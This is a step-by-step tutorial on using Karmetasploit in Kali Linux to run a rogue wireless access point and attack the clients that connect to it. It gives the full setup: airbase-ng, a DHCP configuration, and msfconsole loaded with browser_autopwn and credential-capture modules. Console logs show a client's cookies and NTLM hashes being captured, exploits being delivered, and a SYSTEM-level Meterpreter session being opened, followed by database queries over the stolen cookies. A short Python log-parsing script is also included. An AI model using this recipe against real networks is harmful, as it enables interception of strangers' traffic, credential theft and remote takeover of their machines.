MSF Karmetasploit
In this post we will try to give an overview of Karmetasploit within Metasploit. In general, we will look at its installation, its configuration and an example of its use.
What is Karmetasploit?
Karmetasploit is a tool used to create access points, capture passwords, gather information and carry out web browser attacks. In short, you create a fake modem or access point, a number of users connect to it, and thanks to Karmetasploit you can listen to their traffic.
Setting Up Karmetasploit
Now let's see how Karmetasploit is made ready for use inside Kali Linux. Our first step is downloading the resource file.
root@kali:~# wget https://www.offensive-security.com/assets/images/2015/04/karma.rc_.txt
--2015-04-03 16:17:27-- https://www.offensive-security.com/downloads/karma.rc
Resolving www.offensive-security.com (www.offensive-security.com)... 198.50.176.211
Connecting to www.offensive-security.com (www.offensive-security.com)|198.50.176.211|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1089 (1.1K) [text/plain]
Saving to: `karma.rc' 100%[======================================>] 1,089 --.-K/s in 0s
2015-04-03 16:17:28 (35.9 MB/s) - `karma.rc' saved [1089/1089]
root@kali:~#
What needs to happen when users connect to the access point we will create? Naturally, the connecting user is expected to be assigned an IP address. So we must configure the Kali Linux system as a DHCP server.
Now let's install isc-dhcp-server inside Kali Linux.
root@kali:~# apt update
...snip...
root@kali:~# apt -y install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~#
After the installation completes, let's make the necessary settings in dhcpd.conf. After taking a backup of the dhcpd.conf file, you should make it look like the example below.
root@kali:~# cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
root@kali:~#
Now let's install a few prerequisites.
Install the libsqlite3-dev Package
root@kali:~# apt -y install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
Install the activerecord and sqlite3 Ruby Modules
root@kali:~# gem install activerecord sqlite3
Fetching: activerecord-5.0.0.1.gem (100%)
Successfully installed activerecord-5.0.0.1
Parsing documentation for activerecord-5.0.0.1
Installing ri documentation for activerecord-5.0.0.1
Done installing documentation for activerecord after 7 seconds
Fetching: sqlite3-1.3.12.gem (100%)
Building native extensions. This could take a while...
Successfully installed sqlite3-1.3.12
Parsing documentation for sqlite3-1.3.12
Installing ri documentation for sqlite3-1.3.12
Done installing documentation for sqlite3 after 0 seconds
2 gems installed
root@kali:~#
We are now ready to use Karmetasploit. The steps we will carry out, in order, are:
- Identify the wireless card.
- Start the wireless card in monitor mode.
- Start a new wireless network.
Identify the Wireless Interface Name
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Start airmon-ng
root@kali:~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
693 dhclient
934 wpa_supplicant
Start airbase-ng in Monitor Mode
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v wlan0mon
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on wlan0mon to 1800
22:52:25 Access Point with BSSID 00:C0:CA:82:D9:63 started.
As seen in the output above, a new interface named at0 was started. Now let's put our own machine on this network.
root@kali:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@kali:~#
We are about to start the DHCP server. When the server starts, it will need a database in which the information it collects (the leases) is recorded. So let's first create this database file and then start the DHCP server.
root@kali:~# touch /var/lib/dhcp/dhcpd.leases
root@kali:~# dhcpd -cf /etc/dhcp/dhcpd.conf at0
Internet Systems Consortium DHCP Server 4.3.3
Copyright 2004-2015 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 0 leases to leases file.
Listening on LPF/at0/00:c0:ca:82:d9:63/10.0.0.0/24
Sending on LPF/at0/00:c0:ca:82:d9:63/10.0.0.0/24
Sending on Socket/fallback/fallback-net
root@kali:~# ps aux | grep [d]hcpd
root 2373 0.0 0.4 28448 9532 ? Ss 13:45 0:00 dhcpd -cf /etc/dhcp/dhcpd.conf at0
root@kali:~#
Let's start msfconsole, pointing it at the karma.rc_.txt file we downloaded at the beginning as an external resource.
root@kali:~# msfconsole -q -r karma.rc_.txt
[*] Processing karma.rc_.txt for ERB directives.
resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
resource (karma.rc_.txt)> use auxiliary/server/browser_autopwn
resource (karma.rc_.txt)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (karma.rc_.txt)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (karma.rc_.txt)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (karma.rc_.txt)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (karma.rc_.txt)> set LPORT 45000
LPORT => 45000
resource (karma.rc_.txt)> set SRVPORT 55550
SRVPORT => 55550
resource (karma.rc_.txt)> set URIPATH /ads
URIPATH => /ads
resource (karma.rc_.txt)> run
[*] Auxiliary module execution completed
resource (karma.rc_.txt)> use auxiliary/server/capture/pop3
resource (karma.rc_.txt)> set SRVPORT 110
SRVPORT => 110
resource (karma.rc_.txt)> set SSL false
SSL => false
resource (karma.rc_.txt)> run
[*] Auxiliary module execution completed
resource (karma.rc_.txt)> use auxiliary/server/capture/pop3
resource (karma.rc_.txt)> set SRVPORT 995
SRVPORT => 995
resource (karma.rc_.txt)> set SSL true
SSL => true
resource (karma.rc_.txt)> run
[*] Auxiliary module execution completed
resource (karma.rc_.txt)> use auxiliary/server/capture/ftp
[*] Setup
resource (karma.rc_.txt)> run
[*] Listening on 0.0.0.0:110...
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(http) >
We are now listening over the access point we created. When a user connects to this point over wireless and starts doing things on the web, all of the traffic is recorded in our database.
Let's look at the recorded packets.
msf auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3; MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage; hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
...snip...
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Request '/ads' from 10.0.0.100:1278
[*] Recording detection from User-Agent
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Browser claims to be MSIE 5.01, running on Windows 2000
[*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
[*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3
...snip...
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...
[*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
...snip...
[*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)
msf auxiliary(http) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 10.0.0.1:45017 -> 10.0.0.100:1364
From the output above we can see that the user connected to many addresses and carried out various operations. Let's examine this output piece by piece.
[*] DNS 10.0.0.100:1284 XID 92 (IN::A ecademy.com)
[*] DNS 10.0.0.100:1286 XID 93 (IN::A facebook.com)
[*] DNS 10.0.0.100:1286 XID 93 (IN::A facebook.com)
[*] DNS 10.0.0.100:1287 XID 94 (IN::A gather.com)
[*] DNS 10.0.0.100:1287 XID 94 (IN::A gather.com)
In this part, a DNS lookup is being performed for the addresses the user wants to connect to.
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
Here we can see Karmetasploit collecting cookie information from the client. This could be useful information to use in attacks against the user later on.
[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGET\P0WN3D...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGET\P0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)
In this part we see that the user's password information and cookie information are being collected. After these operations, a session is being opened on the target machine.
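To make sense of a capture like the one above, the following Python script, an added example and not Metasploit's or Karmetasploit's own code, parses the console line formats shown above (the DNS, HTTP REQUEST, Received and Meterpreter session lines) into a per-client summary of what that client exposed: the names it resolved, the hosts it sent cookies to over plain HTTP (only the cookie names are kept), the accounts whose NTLM responses were captured, and any session that was opened. The regular expressions and the constructed sample lines are assumptions about the exact output format; the hash values in the sample are the ones printed above.

```python
"""Summarise Karmetasploit console output per client (added example)."""
import re
from collections import defaultdict

# Constructed sample, shaped like the msfconsole output above. A raw string is
# used because the DOMAIN\user field contains a backslash.
SAMPLE_LOG = r"""
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MUID=E7E065776DBC40099851B16A38DB8275; CULTURE=EN-US
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba; NID=22=nFGYMj-l7FaT7qz3
[*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)
"""

# Line patterns read off the output above (assumed, not taken from Metasploit).
DNS_RE = re.compile(r"^\[\*\] DNS (?P<ip>[\d.]+):\d+ XID \d+ \(IN::A (?P<name>\S+)\)$")
HTTP_RE = re.compile(r"^\[\*\] HTTP REQUEST (?P<ip>[\d.]+) > (?P<host>[^:\s]+):(?P<port>\d+) "
                     r"(?P<meth>\S+) (?P<path>\S+) (?P<agent>.*?) cookies=(?P<cookies>.*)$")
NTLM_RE = re.compile(r"^\[\*\] Received (?P<ip>[\d.]+):\d+ (?:(?P<user>\S+) )?"
                     r"LMHASH:(?P<lm>\S*) NTHASH:(?P<nt>\S*) OS:(?P<os>.*?) LM:.*$")
SESSION_RE = re.compile(r"^\[\*\] Meterpreter session (?P<sid>\d+) opened "
                        r"\(\S+ -> (?P<ip>[\d.]+):\d+\)$")


def cookie_names(cookie_str):
    """'a=1; b=2=3' -> ['a', 'b']: record which cookies were sent, never their values."""
    return [c.strip().split("=", 1)[0] for c in cookie_str.split(";") if c.strip()]


def new_client():
    return {"dns": set(), "agents": set(), "cookies": {}, "ntlm_users": [], "sessions": []}


def summarize(log_text):
    """Return {client_ip: summary} for every client that appears in the log."""
    clients = defaultdict(new_client)
    for line in log_text.splitlines():
        line = line.rstrip()
        if m := DNS_RE.match(line):
            clients[m["ip"]]["dns"].add(m["name"])        # repeated lookups collapse
        elif m := HTTP_RE.match(line):
            c = clients[m["ip"]]
            c["agents"].add(m["agent"])
            names = cookie_names(m["cookies"])
            if names:  # cookies that crossed the rogue AP in clear text
                c["cookies"].setdefault(m["host"], []).extend(names)
        elif m := NTLM_RE.match(line):
            # Anonymous probes carry an empty NT response; only real accounts count.
            if m["nt"] and m["user"]:
                clients[m["ip"]]["ntlm_users"].append(m["user"])
        elif m := SESSION_RE.match(line):
            clients[m["ip"]]["sessions"].append(int(m["sid"]))
    return dict(clients)


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info)
```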
Let's look at what can be done in the opened Meterpreter session.
msf auxiliary(http) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
144 smss.exe \SystemRoot\System32\smss.exe
172 csrss.exe \??\C:\WINNT\system32\csrss.exe
192 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
220 services.exe C:\WINNT\system32\services.exe
232 lsass.exe C:\WINNT\system32\lsass.exe
284 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
300 KodakImg.exe C:\Program Files\Windows NT\Accessories\ImageVueKodakImg.exe
396 svchost.exe C:\WINNT\system32\svchost.exe
416 spoolsv.exe C:\WINNT\system32\spoolsv.exe
452 svchost.exe C:\WINNT\System32\svchost.exe
488 regsvc.exe C:\WINNT\system32\regsvc.exe
512 MSTask.exe C:\WINNT\system32\MSTask.exe
568 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
632 WinMgmt.exe C:\WINNT\System32\WBEM\WinMgmt.exe
696 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
760 Explorer.exe C:\WINNT\Explorer.exe
832 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
848 rundll32.exe C:\WINNT\system32\rundll32.exe
860 VMwareUser.exe C:\Program Files\VMware\VMware Tool\VMwareUser.exe
884 RtWLan.exe C:\Program Files\ASUS WiFi-AP Solo\RtWLan.exe
916 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
952 SCardSvr.exe C:\WINNT\System32\SCardSvr.exe
1168 IEXPLORE.EXE C:\Program Files\Internet Explorer\IEXPLORE.EXE
meterpreter > ipconfig /all
VMware Accelerated AMD PCNet Adapter
Hardware MAC: 00:0c:29:85:81:55
IP Address : 0.0.0.0
Netmask : 0.0.0.0
Realtek RTL8187 Wireless LAN USB NIC
Hardware MAC: 00:c0:ca:1a:e7:d4
IP Address : 10.0.0.100
Netmask : 255.255.255.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
meterpreter > pwd
C:\WINNT\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
As you can see, we showed by example what can be done in the opened session. In addition, as information gathering continues, an enormous amount of information will be recorded. To make use of it you may feel the need to look at the database, so let's now interact with the database.
The database was created in the home folder. Let's connect to it with the following command.
root@kali:~# sqlite3 karma.db
SQLite version 3.5.9
Enter ".help" for instructions
sqlite> .schema
CREATE TABLE hosts (
'id' INTEGER PRIMARY KEY NOT NULL,
'created' TIMESTAMP,
'address' VARCHAR(16) UNIQUE,
'comm' VARCHAR(255),
'name' VARCHAR(255),
'state' VARCHAR(255),
'desc' VARCHAR(1024),
'os_name' VARCHAR(255),
'os_flavor' VARCHAR(255),
'os_sp' VARCHAR(255),
'os_lang' VARCHAR(255),
'arch' VARCHAR(255)
);
CREATE TABLE notes (
'id' INTEGER PRIMARY KEY NOT NULL,
'created' TIMESTAMP,
'host_id' INTEGER,
'ntype' VARCHAR(512),
'data' TEXT
);
CREATE TABLE refs (
'id' INTEGER PRIMARY KEY NOT NULL,
'ref_id' INTEGER,
'created' TIMESTAMP,
'name' VARCHAR(512)
);
CREATE TABLE reports (
'id' INTEGER PRIMARY KEY NOT NULL,
'target_id' INTEGER,
'parent_id' INTEGER,
'entity' VARCHAR(50),
'etype' VARCHAR(50),
'value' BLOB,
'notes' VARCHAR,
'source' VARCHAR,
'created' TIMESTAMP
);
CREATE TABLE requests (
'host' VARCHAR(20),
'port' INTEGER,
'ssl' INTEGER,
'meth' VARCHAR(20),
'path' BLOB,
'headers' BLOB,
'query' BLOB,
'body' BLOB,
'respcode' VARCHAR(5),
'resphead' BLOB,
'response' BLOB,
'created' TIMESTAMP
);
CREATE TABLE services (
'id' INTEGER PRIMARY KEY NOT NULL,
'host_id' INTEGER,
'created' TIMESTAMP,
'port' INTEGER NOT NULL,
'proto' VARCHAR(16) NOT NULL,
'state' VARCHAR(255),
'name' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE targets (
'id' INTEGER PRIMARY KEY NOT NULL,
'host' VARCHAR(20),
'port' INTEGER,
'ssl' INTEGER,
'selected' INTEGER
);
CREATE TABLE vulns (
'id' INTEGER PRIMARY KEY NOT NULL,
'service_id' INTEGER,
'created' TIMESTAMP,
'name' VARCHAR(1024),
'data' TEXT
);
CREATE TABLE vulns_refs (
'ref_id' INTEGER,
'vuln_id' INTEGER
);
Using the database schema, let's check the recorded information.
sqlite> select * from hosts;
1|2009-05-09 23:47:04|10.0.0.100|||alive||Windows|2000|||x86
sqlite> select * from notes where host_id = 1;
1|2009-05-09 23:47:04|1|http_cookies|en-us.start2.mozilla.com __utma=183859642.1221819733.1241334886.1241334886.1241334886.1; __utmz=183859642.1241334886.1.1.utmccn=(organic)|utmcsr=google|utmctr=firefox|utmcmd=organic
2|2009-05-09 23:47:04|1|http_request|en-us.start2.mozilla.com:80 GET /firefox Windows FF 1.9.0.10
3|2009-05-09 23:47:05|1|http_cookies|adwords.google.com PREF=ID=ee60297d21c2a6e5:U=ecaec12d78faa1ba:TM=1241913986:LM=1241926890:GM=1:S=-p5nGxSz_oh1inss; NID=22=Yse3kJm0PoVwyYxj8GKC6LvlIqQMsruiPwQrcRRnLO_4Z0CzBRCIUucvroS_Rujrx6ov-tXzVKN2KJN4pEJdg25ViugPU0UZQhTuh80hNAPvvsq2_HARTNlG7dgUrBNq; SID=DQAAAHAAAADNMtnGqaWPkEBIxfsMQNzDt_f7KykHkPoYCRZn_Zen8zleeLyKr8XUmLvJVPZoxsdSBUd22TbQ3p1nc0TcoNHv7cEihkxtHl45zZraamzaji9qRC-XxU9po34obEBzGotphFHoAtLxgThdHQKWNQZq
4|2009-05-09 23:47:05|1|http_request|adwords.google.com:80 GET /forms.html Windows FF 1.9.0.10
5|2009-05-09 23:47:05|1|http_request|blogger.com:80 GET /forms.html Windows FF 1.9.0.10
6|2009-05-09 23:47:05|1|http_request|care.com:80 GET /forms.html Windows FF 1.9.0.10
7|2009-05-09 23:47:05|1|http_request|0.0.0.0:55550 GET /ads Windows Firefox 3.0.10
8|2009-05-09 23:47:06|1|http_request|careerbuilder.com:80 GET /forms.html Windows FF 1.9.0.10
9|2009-05-09 23:47:06|1|http_request|ecademy.com:80 GET /forms.html Windows FF 1.9.0.10
10|2009-05-09 23:47:06|1|http_cookies|facebook.com datr=1241925583-120e39e88339c0edfd73fab6428ed813209603d31bd9d1dccccf3; ABT=::#b0ad8a8df29cc7bafdf91e67c86d58561st0:1242530384:A#2dd086ca2a46e9e50fff44e0ec48cb811st0:1242530384:B; s_vsn_facebookpoc_1=7269814957402
11|2009-05-09 23:47:06|1|http_request|facebook.com:80 GET /forms.html Windows FF 1.9.0.10
12|2009-05-09 23:47:06|1|http_request|gather.com:80 GET /forms.html Windows FF 1.9.0.10
13|2009-05-09 23:47:06|1|http_request|gmail.com:80 GET /forms.html Windows FF 1.9.0.10
